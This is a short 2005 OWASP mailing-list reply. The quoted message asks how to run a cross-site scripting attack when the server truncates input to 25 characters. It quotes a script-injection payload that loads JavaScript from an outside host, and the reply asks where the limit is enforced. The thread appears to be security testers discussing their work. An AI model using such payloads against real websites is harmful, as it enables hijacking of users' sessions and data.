[OWASP-TESTING] Re: [OWASP-Chapters] XSS in 25 characters or less

Daniel Cuthbert daniel.cuthbert at owasp.org
Thu May 19 07:10:09 EDT 2005


Interestingly, why have they only restricted it to 25 characters and  
where is this being enforced and by what?


On 18 May 2005, at 16:22, Eoin Keary wrote:

> Hi,
> I have a window of 25 chars to perform an XSS exploit.
> Anything more is truncated by the server.
>
> <script src=http://a.com/z.js></script>
>
> - this is 39 chars
> We can do HTML injection ("<a href=....") to a degree, but has anyone
> any ideas on how to execute script in such a small window (25 chars)?
> We need to stay in the same domain (xyz.com) in order to make the
> attack useful, so redirecting to another domain with the "<a
> href..." is no good.
>
> First correct answer gets a pint of Guinness (Larry S, you're not  
> included for the pint as I owe you too many).
>
> Eoin
>